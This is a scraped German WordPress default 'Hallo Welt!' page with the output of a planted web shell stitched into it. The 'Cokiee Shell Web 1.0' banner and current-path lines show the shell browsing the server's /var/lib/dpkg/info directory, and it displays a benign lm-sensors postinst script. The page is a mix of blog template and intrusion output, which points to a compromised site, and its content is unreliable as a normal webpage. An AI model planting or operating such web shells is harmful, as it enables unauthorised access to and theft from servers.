Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/lib/dpkg/info/ |
Current File : //var/lib/dpkg/info/lm-sensors.postinst |
#!/bin/sh # postinst script for sensord # # see: dh_installdeb(1) set -e case "$1" in configure) # Remove shutdown and reboot links; this init script does not need them. if dpkg --compare-versions "$2" lt "1:3.0.2-2"; then rm -f /etc/rc0.d/K[0-9][0-9]sensord /etc/rc6.d/K[0-9][0-9]sensord fi ;; abort-upgrade|abort-remove|abort-deconfigure) ;; *) echo "postinst called with unknown argument \`$1'" >&2 exit 1 ;; esac # Automatically added by dh_installinit if [ -x "/etc/init.d/lm-sensors" ]; then update-rc.d lm-sensors start 47 S . >/dev/null || exit $? fi # End automatically added section
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare